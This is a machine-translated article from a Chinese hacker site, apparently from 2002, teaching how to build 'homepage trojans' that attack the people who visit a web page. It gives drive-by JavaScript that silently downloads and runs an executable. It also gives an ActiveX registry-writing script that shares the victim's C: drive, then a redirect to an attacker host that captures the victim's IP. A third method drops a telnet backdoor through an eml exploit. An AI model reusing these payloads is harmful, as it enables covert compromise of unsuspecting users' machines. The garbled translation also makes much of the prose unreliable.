The homepage wooden horse displays |http://www.cshu.net again




                               About us 
                               Commercial cooperation 
                               Copyright declaration 
                               Contacts with us 



            Returns to the home pageArticle browsingOther columnsLands the forum


            |   The absolute &#21019;   |   |   hacker file   |   |   is newest 
            dynamically   |   
                  |  Hacker file>>invasion analysis>> homepage wooden horse 
                  again display  Printing

            Homepage wooden horse again display 
            Www.cshu.net  2002-8-18  fog rain village 

              Everybody to wooden horse all not strange, it possibly had to be 
              in the computer virus history is fiercest, believed could cause 
              the wooden horse the person great amount, how but had very many 
              people painstakingly to to issue the wooden horse opposite party, 
              now along with the computer popularization, I believed the very 
              few some people in the network to be able the easily receive 
              opposite party document, therefore the homepage wooden horse was 
              born. 
              1. It should be html leads under the same way a exe document main 
              page, also was when the browser glanced over this page time, a exe 
              document on automatically downloaded in the backstage and has 
              carried out, was allowed to make test.html as follows the document 
              in the tabletop, the content: 
              <script language= "javascript" > 
              Run_exe= "<OBJECT ID=\" RUNIT\ "WIDTH=0 HEIGHT=0 TYPE=\" 
              application/x-oleobject\ "" 
              Run_exe+= "CODEBASE=\" test.exe#version=1,1,1,1\ ">" 
              Run_exe+= "<PARAM NAME=\" _Version\ "value=\" 65536\ ">" 
              Run_exe+= "</OBJECT>" 
              Run_exe+= "in <HTML><H1> homepage increase, please later.... 
              </H1></HTML>"; 
              Document.open (); 
              Document.clear (); 
              Document.writeln (run_exe); 
              Document.close (); 
              </script> 
              Again casually looks for exe under the tabletop the document, the 
              name certainly must change tset.exe, has been good, this time 
              double-clicks html document which we produced a moment ago, when 
              saw "in the homepage increase, please later...." Time, under our 
              that same way exe document unconditionally has been also carried 
              out, this kind of page merit is translates the revision to be 
              simple, but! When your application has gotten down a each one 
              person of main page space time, passes on these two documents in 
              the time, when you attempt glances over your masterpiece time 
              through the browser, the ie safe warning jumped, I thought several 
              people have not wanted the little darling to take the risk to go 
              to the spot "are", has been good, although this homepage wooden 
              horse in local is how perfect, but put on-line could not pass ie 
              the security policy, this young Ma was defeated. 
              2. Is reads in the registration table through the ie own loophole, 
              believed very many people frequently are glancing over some main 
              pages time, the registration coating changes, the ie title at 
              sixes and sevens is changed, the home page is changed, the 
              registration table editor is been durable and so on, these all 
              automatically revised your registration table homepage 
              masterpiece, therefore my gate also was allowed to make a page to 
              let the browsing hard disk completely share, also was makes html 
              as follows the document, the content: 
              Script language=javascript> 
              Document.write ("<APPLET HEIGHT=0 WIDTH=0 
              code=com.ms.activeX.ActiveXComponent></APPLET>"); 
              Function f () { 
              A1=document.applets [ 0 ]; 
              A1.setCLSID ("{F935dc22-1cf0-11d0-adb9-00c04fd58a0b}"); 
              A1.createInstance (); 
              Shl = a1.GetObject (); 
              Shl.RegWrite 
              ("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Network\\LanMan\\RWC$\\Flags",402, 
              "REG_DWORD"); 
              Shl.RegWrite 
              ("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Network\\LanMan\\RWC$\\Type",0, 
              "REG_DWORD" 
              ); 
              Shl.RegWrite 
              ("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Network\\LanMan\\RWC$\\Path", 
              "C:\\"); 
              } 
              Function init () 
              { 
              SetTimeout ("f ()", 1,000); 
              } 
              Init (); 
              </script> 
              When opposite party browsing this page time, his c: Was shared, 
              after sharing enters the method. Ha-ha did not need to say, but he 
              although by altogether lane, but you did not know who was looking 
              your this page, his ip also was how many you all did not know, has 
              not related, has a very simple method, went to 163 to apply for a 
              domain name the transformation, for example: In the 
              http://123123.126.com connection goal address certainly must fill 
              in you now the ip port to aim at own 8,888 ports, again revises 
              above shares c: The html code, after finally adds on 5 seconds 
              automatically to jump changes to http://123123.126.com the code, I 
              want to be the main page person to be able, here in has not talked 
              incessantly, here principle is when opposite party has turned on 
              this html page, the malicious code can let his hard disk sharing, 
              after 5 seconds pages automatically jump the extension, but has 
              aimed at you computer 8,888 ports, By now your firewall could 
              record attempts from x.x.x.x ip to connect your 8,888 ports 
              (before this to have first slightly to establish own firewall) 
              this x.x.x.x ip was victim's ip, was left over the matter was 
              sharing connects. 
              This kind of homepage wooden horse characteristic compares the 
              security, was not suitably discovered by opposite party, but the 
              use trouble needs to involve to very many things. 
              3. Also was the present is easiest to use one plants, personally 
              thought. It is does an exquisite exe document a eml document, 
              again uses ie the loophole to let html the page carry out this eml 
              document, your that exquisite exe document has been carried out, 
              after because code excessively long and further because each exe 
              file conversion code different therefore is impossible 11 to 
              write, below produces address http://jy86.126.com is in fact 
              changes to http://go8.163.com/forevergujia/jy.htm the domain name, 
              when you have completely opened this page time, only had a 5k many 
              small back door to open, You may 3,385 completely control opposite 
              party through telnet x.x.x.x (this 5k young back door are the 
              winshell5.0 black and white network have, simultaneously this 
              winshell5.0 also has a very splendid function, is can download you 
              beforehand to establish assigns under way a document, and carries 
              out him, I lays aside is network deeply steals, if your &#26432;Ը 
              software suffices fierce, god steals is may find out, here only is 
              tests, is actual may assign very not to look up young Ma, here 
              does not elaborate), has the interest the friend may come to try. 
              This kind of homepage wooden horse characteristic is, opposite 
              party suffers planting rate to be higher, troubles besides the 
              manufacture, no shortcoming: ) 
              The good all loopholes all were the establishment at under the 
              system loophole premise, the multi- promotion had the patch not to 
              have the fault: )
              ___________________________________________________________
              Cannot make the homepage wooden horse to go to the forum to send 
              pastes consults me. . . . . . . . . . . . . . . .



              Original author: Loves -> the cat ->  
              Origin: Loves -> the cat ->  
              Altogether has 104 readers to read this article 

              [Tells friend] 
            Previous article:Counter- black "loves the chicken" in you center 
            under the wooden horse person 

            Next article:The common hacker invades several commonly used orders 
            which needs! ~ 

            - this week popular article - related article 
            Homepage wooden horse again display 



      CSHU 
